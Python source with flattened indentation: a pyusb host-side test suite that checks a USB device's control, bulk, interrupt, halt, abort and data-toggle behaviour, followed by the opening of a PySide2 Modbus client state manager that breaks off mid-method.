except usb.core.USBError:
raise_unconditionally(lineno(), "VENDOR_TEST_CTRL_IN_SIZES failed")
count += 1
def control_stress_test(dev, log):
"""
Test various patterns of control transfers
Given an initialized USB (HOST <---> DUT connection established)
When stress control transfer with a data in stage is performed
Then transfer ends with success
When stress control transfer with a data out stage followed by a control transfer with a data in stage is performed
Then transfer ends with success
When stress control transfer with a data out stage is performed
Then transfer ends with success
"""
# Some devices have had problems with back-to-back
# control transfers. Intentionally send these sequences
# to make sure they are properly handled.
count = 0
for _ in range(100):
# Control transfer with a data in stage
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_IN
value = 8 # Size of data the device should actually send
index = count # Unused - set for debugging only
length = 255
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
count += 1
for _ in range(100):
# Control transfer with a data out stage followed
# by a control transfer with a data in stage
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_OUT
value = 8 # Size of data the device should actually read
index = count # Unused - set for debugging only
data = bytearray(8) # Dummy data
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
count += 1
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_IN
value = 8 # Size of data the device should actually send
index = count # Unused - set for debugging only
length = 255
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
count += 1
for _ in range(100):
# Control transfer with a data out stage
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_OUT
value = 8 # Size of data the device should actually read
index = count # Unused - set for debugging only
data = bytearray(8) # Dummy data
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
count += 1
def find_ep_pair(intf, endpoint_type):
"""Find an OUT and IN endpoint pair.
Raise a RuntimeError if any endpoint could not be found
or wMaxPacketSize is not equal for both endpoints.
"""
ep_out = usb.util.find_descriptor(
intf, custom_match=lambda e:
usb.util.endpoint_type(e.bmAttributes) == endpoint_type and
usb.util.endpoint_direction(e.bEndpointAddress) == usb.ENDPOINT_OUT)
ep_in = usb.util.find_descriptor(
intf, custom_match=lambda e:
usb.util.endpoint_type(e.bmAttributes) == endpoint_type and
usb.util.endpoint_direction(e.bEndpointAddress) == usb.ENDPOINT_IN)
if not all((ep_out, ep_in)):
raise_unconditionally(lineno(), 'Unable to find {} endpoint pair.'
.format(ENDPOINT_TYPE_NAMES[endpoint_type]))
raise_if_different(ep_out.wMaxPacketSize, ep_in.wMaxPacketSize, lineno(),
'wMaxPacketSize not equal for OUT and IN {} endpoints.'
.format(ENDPOINT_TYPE_NAMES[endpoint_type]))
return ep_out, ep_in
def loopback_ep_test(ep_out, ep_in, payload_size):
"""Send and receive random data using OUT/IN endpoint pair.
Verify that data received from IN endpoint is equal to
data sent to OUT endpoint.
Raise a RuntimeError if data does not match.
"""
payload_out = array.array('B', (random.randint(0x00, 0xff) for _ in range(payload_size)))
ep_out.write(payload_out)
payload_in = ep_in.read(ep_in.wMaxPacketSize)
raise_if_different(payload_out, payload_in, lineno(), 'Payloads mismatch.')
def random_size_loopback_ep_test(ep_out, ep_in, failure, error, seconds, log, min_payload_size=1):
"""Repeat data transfer test for OUT/IN endpoint pair for a given time.
Set a failure Event if OUT/IN data verification fails.
Set an error Event if unexpected USB error occurs.
"""
end_ts = time.time() + seconds
while time.time() < end_ts and not failure.is_set() and not error.is_set():
payload_size = random.randint(min_payload_size, ep_out.wMaxPacketSize)
try:
loopback_ep_test(ep_out, ep_in, payload_size)
except RuntimeError as err:
log(err)
failure.set()
return
except usb.USBError as err:
log(USB_ERROR_FMT.format(err, ep_out, ep_in, payload_size))
error.set()
return
time.sleep(0.01)
def halt_ep_test(dev, ep_out, ep_in, log):
"""OUT/IN endpoint halt test.
Verify that halting an endpoint at a random point of OUT or IN transfer
raises a USBError.
Raise a RuntimeError if halt fails or any unexpected error occurs.
"""
MIN_HALT_DELAY = 0.01
MAX_HALT_DELAY = 0.1
POST_HALT_DELAY = 0.1
ctrl_error = Event()
for ep in (ep_out, ep_in):
try:
if (usb.control.get_status(dev, ep) == 1):
raise_unconditionally(lineno(), 'Endpoints must NOT be halted at the start of this test')
except usb.core.USBError as err:
raise_unconditionally(lineno(), 'Unable to get endpoint status ({!r}).'.format(err))
ep_to_halt = random.choice([ep_out, ep_in])
def timer_handler():
"""Halt an endpoint using a USB control request."""
try:
usb.control.set_feature(dev, FEATURE_ENDPOINT_HALT, ep_to_halt)
if (usb.control.get_status(dev, ep_to_halt) != 1):
raise RuntimeError('Invalid endpoint status after halt operation')
except Exception as err:
ctrl_error.set()
log('Endpoint {:#04x} halt failed ({!r}).'.format(ep_to_halt.bEndpointAddress, err))
# Whether the halt operation was successful or not,
# wait a bit so the main thread has a chance to run into a USBError
# or report the failure of halt operation.
time.sleep(POST_HALT_DELAY)
delay = random.uniform(MIN_HALT_DELAY, MAX_HALT_DELAY)
delayed_halt = Timer(delay, timer_handler)
delayed_halt.start()
# Keep transferring data to and from the device until one of the endpoints
# is halted.
try:
while delayed_halt.is_alive():
if ctrl_error.is_set():
break
try:
loopback_ep_test(ep_out, ep_in, ep_out.wMaxPacketSize)
except usb.core.USBError as err:
if ctrl_error.is_set():
break
try:
ep_status = usb.control.get_status(dev, ep_to_halt)
except usb.core.USBError as err:
if ctrl_error.is_set():
break
raise_unconditionally(lineno(), 'Unable to get endpoint status ({!r}).'.format(err))
if ep_status == 1:
# OK, got USBError because of endpoint halt
return
else:
raise_unconditionally(lineno(), 'Unexpected error ({!r}).'.format(err))
if ctrl_error.is_set():
raise_unconditionally(lineno(), 'Halting endpoint {0.bEndpointAddress:#04x} failed'
.format(ep_to_halt))
finally:
# Always wait for the Timer thread created above.
delayed_halt.join()
if not ctrl_error.is_set():
ep_out.clear_halt()
ep_in.clear_halt()
raise_unconditionally(lineno(), 'Halting endpoint {0.bEndpointAddress:#04x}'
' during transmission did not raise USBError.'
.format(ep_to_halt))
def request_endpoint_loops_restart(dev):
ctrl_kwargs = {
'bmRequestType': build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR, CTRL_RECIPIENT_DEVICE),
'bRequest': VENDOR_TEST_RW_RESTART,
'wValue': 0,
'wIndex': 0}
dev.ctrl_transfer(**ctrl_kwargs)
def request_abort_buff_check(dev, ep):
ctrl_kwargs = {
'bmRequestType': build_request_type(CTRL_IN, CTRL_TYPE_VENDOR, CTRL_RECIPIENT_ENDPOINT),
'bRequest': VENDOR_TEST_ABORT_BUFF_CHECK,
'wValue': 0,
'wIndex': ep.bEndpointAddress,
'data_or_wLength': 1}
return bool(dev.ctrl_transfer(**ctrl_kwargs)[0])
USB_ERROR_FMT = ('Got {0!r} while testing endpoints '
'{1.bEndpointAddress:#04x}({1.wMaxPacketSize:02}) and '
'{2.bEndpointAddress:#04x}({2.wMaxPacketSize:02}) with '
'a random payload of {3} B.')
def ep_test_data_correctness(dev, log, verbose=False):
"""Test data correctness for every OUT/IN endpoint pair.
Given a USB device with multiple OUT/IN endpoint pairs
When the host sends random payloads up to wMaxPacketSize in size
to an OUT endpoint of the device,
and then the device sends data back to host using an IN endpoint
Then data sent and received by host is equal for every endpoint pair
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
iso_out, iso_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_ISOCHRONOUS)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
log('\tiso_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_out))
log('\tiso_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_in))
if verbose:
log('Testing OUT/IN data correctness for bulk endpoint pair.')
for payload_size in range(bulk_out.wMaxPacketSize + 1):
try:
loopback_ep_test(bulk_out, bulk_in, payload_size)
except usb.USBError as err:
raise_unconditionally(lineno(), USB_ERROR_FMT.format(err, bulk_out, bulk_in, payload_size))
if verbose:
log('Testing OUT/IN data correctness for interrupt endpoint pair.')
for payload_size in range(interrupt_out.wMaxPacketSize + 1):
try:
loopback_ep_test(interrupt_out, interrupt_in, payload_size)
except usb.USBError as err:
raise_unconditionally(lineno(), USB_ERROR_FMT.format(err, interrupt_out, interrupt_in, payload_size))
# if verbose:
# log('Testing OUT/IN data correctness for isochronous endpoint pair.')
# payload_size = 128 # range(1, iso_out.wMaxPacketSize + 1):
# try:
# loopback_ep_test(iso_out, iso_in, payload_size)
# except usb.USBError as err:
# log(err)
# raise_unconditionally(lineno(), USB_ERROR_FMT.format(err, iso_out, iso_in, payload_size))
def ep_test_halt(dev, log, verbose=False):
"""Test endpoint halt for every OUT/IN endpoint pair.
Given a USB device with multiple OUT/IN endpoint pairs
When the host issues an endpoint halt control request at a random point
of OUT or IN transfer
Then the endpoint is stalled and all further transfers fail
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
if verbose:
log('Testing endpoint halt at a random point of bulk transmission.')
end_ts = time.time() + 1.0
while time.time() < end_ts:
halt_ep_test(dev, bulk_out, bulk_in, log)
request_endpoint_loops_restart(dev)
if verbose:
log('Testing endpoint halt at a random point of interrupt transmission.')
end_ts = time.time() + 1.0
while time.time() < end_ts:
halt_ep_test(dev, interrupt_out, interrupt_in, log)
request_endpoint_loops_restart(dev)
def ep_test_parallel_transfers(dev, log, verbose=False):
"""Test simultaneous data transfers for multiple OUT/IN endpoint pairs.
Given a USB device with multiple OUT/IN endpoint pairs
When multiple OUT and IN endpoints are used to transfer random test data
Then all transfers succeed
and data received equals data sent for every endpoint pair
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
iso_out, iso_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_ISOCHRONOUS)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
log('\tiso_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_out))
log('\tiso_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_in))
if verbose:
log('Testing simultaneous transfers through bulk and interrupt endpoint pairs.')
test_error = Event()
test_failure = Event()
test_kwargs_bulk_ep = {
'ep_out': bulk_out,
'ep_in': bulk_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
test_kwargs_interrupt_ep = {
'ep_out': interrupt_out,
'ep_in': interrupt_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
ep_test_threads = []
for kwargs in (test_kwargs_bulk_ep, test_kwargs_interrupt_ep):
ep_test_threads.append(Thread(target=random_size_loopback_ep_test, kwargs=kwargs))
for t in ep_test_threads:
t.start()
for t in ep_test_threads:
t.join()
if test_failure.is_set():
raise_unconditionally(lineno(), 'Payload mismatch')
if test_error.is_set():
raise_unconditionally(lineno(), 'USBError')
def ep_test_parallel_transfers_ctrl(dev, log, verbose=False):
"""Test simultaneous data transfers in parallel with control transfers.
Given a USB device with multiple OUT/IN endpoint pairs
When multiple OUT and IN endpoints are used to transfer random data
and control requests are processed in parallel
Then all transfers succeed
and for every endpoint pair, data received by host equals data sent by host
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
iso_out, iso_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_ISOCHRONOUS)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
log('\tiso_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_out))
log('\tiso_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_in))
if verbose:
log('Testing parallel data transfers through bulk, interrupt & control endpoint pairs.')
test_error = Event()
test_failure = Event()
test_kwargs_bulk_ep = {
'ep_out': bulk_out,
'ep_in': bulk_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
test_kwargs_interrupt_ep = {
'ep_out': interrupt_out,
'ep_in': interrupt_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
ep_test_threads = []
for kwargs in (test_kwargs_bulk_ep, test_kwargs_interrupt_ep):
ep_test_threads.append(Thread(target=random_size_loopback_ep_test, kwargs=kwargs))
for t in ep_test_threads:
t.start()
while any(t.is_alive() for t in ep_test_threads):
control_stress_test(dev, log)
control_sizes_test(dev, log)
for t in ep_test_threads:
t.join()
if test_failure.is_set():
raise_unconditionally(lineno(), 'Payload mismatch')
if test_error.is_set():
raise_unconditionally(lineno(), 'USBError')
def ep_test_abort(dev, log, verbose=False):
"""Test aborting data transfer for every OUT/IN endpoint pair.
Given a USB device with multiple OUT/IN endpoint pairs
When a device aborts an in progress data transfer
Then no more data is transmitted
and endpoint buffer is correctly released on the device end
"""
NUM_PACKETS_UNTIL_ABORT = 2
NUM_PACKETS_AFTER_ABORT = 8
# If the host ever receives a payload with any byte set to this value,
# the device does not handle abort operation correctly. The buffer
# passed to aborted operation must not be used after call to abort().
FORBIDDEN_PAYLOAD_VALUE = NUM_PACKETS_AFTER_ABORT + 1
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
if verbose:
log('Testing aborting an in progress transfer for IN endpoints.')
for ep_in in (bulk_in, interrupt_in):
payload_size = (NUM_PACKETS_UNTIL_ABORT + NUM_PACKETS_AFTER_ABORT) * ep_in.wMaxPacketSize
payload_in = array.array('B')
while len(payload_in) < payload_size:
try:
packet = ep_in.read(ep_in.wMaxPacketSize)
payload_in.extend(packet)
except usb.core.USBError as err:
break
if FORBIDDEN_PAYLOAD_VALUE in payload_in:
raise_unconditionally(
lineno(), 'Endpoint buffer not released when aborting the '
'write operation on endpoint {0.bEndpointAddress:#04x}.'
.format(ep_in))
if verbose:
log('The size of data successfully received from endpoint {0.bEndpointAddress:#04x}: {1} B.'
.format(ep_in, len(payload_in)))
too_little = bool(len(payload_in) < (NUM_PACKETS_UNTIL_ABORT * ep_in.wMaxPacketSize))
too_much = bool(len(payload_in) >= payload_size)
if too_little or too_much:
raise_unconditionally(
lineno(), 'Invalid size of data successfully received from endpoint '
'{0.bEndpointAddress:#04x} before aborting the transfer. '
'Value {1} B out of range [{2}, {3}).'
.format(ep_in, len(payload_in),
NUM_PACKETS_UNTIL_ABORT * ep_in.wMaxPacketSize, payload_size))
if verbose:
log('Testing aborting an in progress transfer for OUT endpoints.')
for ep_out in (bulk_out, interrupt_out):
payload_size = (NUM_PACKETS_UNTIL_ABORT + NUM_PACKETS_AFTER_ABORT) * ep_out.wMaxPacketSize
num_bytes_written = 0
while num_bytes_written < payload_size:
payload_out = array.array('B', (num_bytes_written//ep_out.wMaxPacketSize
for _ in range(ep_out.wMaxPacketSize)))
try:
num_bytes_written += ep_out.write(payload_out)
except usb.core.USBError:
break
try:
ep_buff_correct = request_abort_buff_check(dev, ep_out)
except (usb.core.USBError, IndexError, TypeError) as err:
raise_unconditionally(
lineno(), 'Unable to verify endpoint buffer content ({!r}).'.format(err))
if not ep_buff_correct:
raise_unconditionally(
lineno(), 'Endpoint buffer not released when aborting the '
'read operation on endpoint {0.bEndpointAddress:#04x}.'
.format(ep_out))
if verbose:
log('The size of data successfully sent to endpoint {0.bEndpointAddress:#04x}: {1} B.'
.format(ep_out, num_bytes_written))
too_little = bool(num_bytes_written < (NUM_PACKETS_UNTIL_ABORT * ep_out.wMaxPacketSize))
too_much = bool(num_bytes_written >= payload_size)
if too_little or too_much:
raise_unconditionally(
lineno(), 'Invalid size of data successfully sent to endpoint '
'{0.bEndpointAddress:#04x} before aborting the transfer. '
'Value {1} B out of range [{2}, {3}).'
.format(ep_out, num_bytes_written,
NUM_PACKETS_UNTIL_ABORT * ep_out.wMaxPacketSize, payload_size))
def ep_test_data_toggle(dev, log, verbose=False):
"""Test data toggle reset for bulk OUT/IN endpoint pairs.
Given a USB device
When an interface is set
Then the data toggle bits for all endpoints are reset to DATA0
When clear feature is called for an endpoint that *IS NOT* stalled
Then the data toggle is reset to DATA0 for that endpoint
When clear halt is called for an endpoint that *IS* stalled
Then the data toggle is reset to DATA0 for that endpoint
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
if verbose:
log('Testing data toggle reset for bulk endpoint pair.')
# 1.1 reset OUT and IN data toggle to DATA0
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 1.2 send and receive a single data packet,
# so both OUT and IN endpoints switch to DATA1
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
# 1.3 reset OUT and IN data toggle to DATA0
# USB spec, section 9.1.1.5
# "
# Configuring a device or changing an alternate setting causes all of the status and
# configuration values associated with endpoints in the affected interfaces to be set to their default values.
# This includes setting the data toggle of any endpoint using data toggles to the value DATA0.
# "
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 1.4 verify that host and USB device are still in sync with respect to data toggle
try:
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
except usb.USBError as err:
if verbose:
log(USB_ERROR_FMT.format(err, bulk_out, bulk_in, bulk_out.wMaxPacketSize))
raise_unconditionally(lineno(), 'Data toggle not reset when setting interface.')
# 2.1 reset OUT and IN data toggle to DATA0
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 2.2 send and receive a single data packet,
# so both OUT and IN endpoints switch to DATA1
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
# 2.3 reset OUT data toggle to DATA0
# USB spec, section 9.4.5
# "
# For endpoints using data toggle, regardless of whether an endpoint has the Halt feature set, a
# ClearFeature(ENDPOINT_HALT) request always results in the data toggle being reinitialized to DATA0.
# "
bulk_out.clear_halt()
# The ClearFeature(ENDPOINT_HALT) terminates a pending read operation on the device end.
# Use a custom vendor request to restart reading on the OUT endpoint.
# This does not impact the state of the data toggle bit.
request_endpoint_loops_restart(dev)
# 2.4 verify that host and USB device are still in sync with respect to data toggle
try:
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
except usb.USBError as err:
if verbose:
log(USB_ERROR_FMT.format(err, bulk_out, bulk_in, bulk_out.wMaxPacketSize))
raise_unconditionally(lineno(), 'Data toggle not reset when calling ClearFeature(ENDPOINT_HALT) '
'on an endpoint that has not been halted.')
# 3.1 reset OUT and IN data toggle to DATA0
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 3.2 send and receive a single data packet,
# so both OUT and IN endpoints switch to DATA1
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
# 3.3 reset IN data toggle to DATA0
# USB spec, section 9.4.5
# "
# For endpoints using data toggle, regardless of whether an endpoint has the Halt feature set, a
# ClearFeature(ENDPOINT_HALT) request always results in the data toggle being reinitialized to DATA0.
# "
usb.control.set_feature(dev, FEATURE_ENDPOINT_HALT, bulk_in)
bulk_in.clear_halt()
# 3.4 verify that host and USB device are still in sync with respect to data toggle
try:
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
except usb.USBError as err:
if verbose:
log(USB_ERROR_FMT.format(err, bulk_out, bulk_in, bulk_out.wMaxPacketSize))
raise_unconditionally(lineno(), 'Data toggle not reset when clearing endpoint halt.')
def device_reset_test(log):
"""
Test USB implementation against repeated reset
Given an initialized USB (HOST <---> DUT connection established)
When USB device is reset repeatedly
Then the USB is operational with no errors
"""
dev = yield
dev.reset()
dev = yield
# run other test to check if USB works fine after reset
control_data_test(dev, [64, 256], log)
dev.reset()
dev = yield
# run other test to check if USB works fine after reset
control_data_test(dev, [64, 256], log)
dev.reset()
dev = yield
# run other test to check if USB works fine after reset
control_data_test(dev, [64, 256], log)
yield
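# Note added for clarity: the generator-based tests in this module
# (device_reset_test, device_soft_reconnection_test, ...) are driven from the
# Greentea callbacks via .send(). A sketch of the pattern used by
# PyusbBasicTest.setup() and the _callback_* handlers:
#   gen = device_reset_test(log=print)
#   gen.send(None)        # prime the generator up to its first `yield`
#   gen.send(usb_device)  # resume the test with the (re)enumerated device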
def device_soft_reconnection_test(log):
"""
Test USB implementation against repeated reconnection
Given an initialized USB (HOST <---> DUT connection established)
When USB device is disconnected and then connected repeatedly
Then the USB is operational with no errors
"""
list = [64, 256]
dev = yield
# run other test to check if USB works fine before reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
yield
def device_suspend_resume_test(log):
"""
Test USB implementation against repeated suspend and resume
Given an initialized USB (HOST <---> DUT connection established)
When USB device is suspended and then resumed repeatedly
Then the USB is operational with no errors
"""
dev = yield
control_data_test(dev, [64, 256], log)
# suspend code goes here
# ...
# resume code here
# ...
# run other test to check if USB works fine after resume
control_data_test(dev, [64, 256], log)
# suspend code here
# ...
# resume code here
# ...
# run other test to check if USB works fine after resume
control_data_test(dev, [64, 256], log)
# suspend code here
# ...
# resume code here
# ...
# run other test to check if USB works fine after resume
control_data_test(dev, [64, 256], log)
yield
def repeated_construction_destruction_test(log):
"""
Test USB implementation against repeated initialization and deinitialization
Given an initialized USB (HOST <---> DUT connection established)
When USB device is deinitialized and then initialized repeatedly
Then the USB is operational with no errors
"""
list = [64, 256]
dev = yield
# run other test to check if USB works fine after repeated construction/destruction
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after repeated construction/destruction
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after repeated construction/destruction
control_data_test(dev, list, log)
yield
def release_interfaces(dev):
""" Releases interfaces to allow configuration switch
Fixes error while configuration change(on Windows machines):
USBError: [Errno None] libusb0-dll:err [set_configuration] can't change configuration, an interface is still in use (claimed)
"""
cfg = dev.get_active_configuration()
for i in range(0, cfg.bNumInterfaces):
usb.util.release_interface(dev, i)
def restore_default_configuration(dev):
""" Set default configuration """
cfg = dev[1]
cfg.set()
def get_status(dev, recipient, index = 0):
""" Get status of the recipient
Args:
dev - pyusb device
recipient - CTRL_RECIPIENT_DEVICE/CTRL_RECIPIENT_INTERFACE/CTRL_RECIPIENT_ENDPOINT
index - 0 if recipient is device, interface index if recipient is interface, endpoint index if recipient is endpoint
Returns:
16-bit status value as an int
"""
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
recipient)
request = REQUEST_GET_STATUS
value = 0 # Always 0 for this request
index = index # recipient index
length = 2 # Always 2 for this request (size of return data)
ret = dev.ctrl_transfer(request_type, request, value, index, length)
ret = ret[0] | (ret[1] << 8)
return ret
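# Illustrative sketch (not part of the original suite): decoding the 16-bit
# status word returned by get_status() for a device recipient. Bit 0 is
# Self Powered, bit 1 is Remote Wakeup (USB 2.0 specification, section 9.4.5);
# the helper name is an assumption added purely for illustration.
def example_decode_device_status(status):
    """Return the D0/D1 device status bits as a readable dict."""
    return {'self_powered': bool(status & 0x01),
            'remote_wakeup': bool(status & 0x02)}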
def get_descriptor(dev, type_index, lang_id, length):
# Control IN GET_DESCRIPTOR - device
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = REQUEST_GET_DESCRIPTOR
value = type_index # Descriptor Type (H) and Descriptor Index (L)
index = lang_id # 0 or Language ID for this request
length = length # Descriptor Length
ret = dev.ctrl_transfer(request_type, request, value, index, length)
return ret
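# Illustrative usage (not part of the original code): type_index packs the
# descriptor type in the high byte and the descriptor index in the low byte,
# exactly as get_descriptor_test() builds it above, e.g.
#   raw = get_descriptor(dev, (DESC_TYPE_DEVICE << 8) | 0, 0, DEVICE_DESC_SIZE)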
|
state_manager.py
|
import asyncio
from concurrent.futures import ThreadPoolExecutor
from contextlib import suppress
from queue import Queue
from threading import Thread
from PySide2.QtCore import QObject, Signal
from modbus_client.communication.connection import Connection
from modbus_client.db.backend import Backend
from modbus_client.resources.codes import Codes
class StateManager(QObject):
"""
Mediates communication between the GUI and the Connection module while monitoring and storing the current
state of the device it is connected to.
"""
update = Signal(dict)
update_counter = Signal(int)
initiate_live_view_update = Signal()
update_view = Signal(dict)
update_historian = Signal(dict)
export_response = Signal(list)
export_request = Signal(list)
def __init__(self, refresh_time=3):
super(StateManager, self).__init__()
self._refresh_time = refresh_time
self.user_req_queue = Queue()
self.backend = Backend()
self._executor = ThreadPoolExecutor(max_workers=1)
self.current_state = dict()
self._connection = Connection()
self._connected = False
self._pause_refresh = False
self._pause_future = asyncio.Future()
self._pause_future.set_result(True)
def run_loop(self):
"""
Initiates the loop thread of the state manager.
"""
loop_thread = Thread(
target=lambda: asyncio.new_event_loop().run_until_complete(self._write_loop()), daemon=True)
loop_thread.start()
async def _write_loop(self):
while True:
message = await asyncio.get_event_loop().run_in_executor(self._executor, self._ext_get_message)
if type(message) == str:
if message == 'CONN':
try:
connection_response = await self._connection.connect()
self.update.emit(connection_response)
if connection_response == 'ACK':
self.counter_future = asyncio.ensure_future(self._counter())
self._connected = True
except Exception:
self.update.emit('wstunnel_error')
elif message == 'DC':
if self._connected:
await self._connection.close()
self.counter_future.cancel()
await self.counter_future
self.update_counter.emit(0)
self._connected = False
elif message == 'close':
if self._connected:
await self._connection.close()
self.counter_future.cancel()
await self.counter_future
await self.backend.close()
return
elif message == 'update_historian':
self.update_historian.emit({'request_history': await self.backend.get_request_history(),
'response_history': await self.backend.get_response_history()})
elif message == 'export_request':
self.export_request.emit(await self.backend.get_request_history())
elif message == 'export_response':
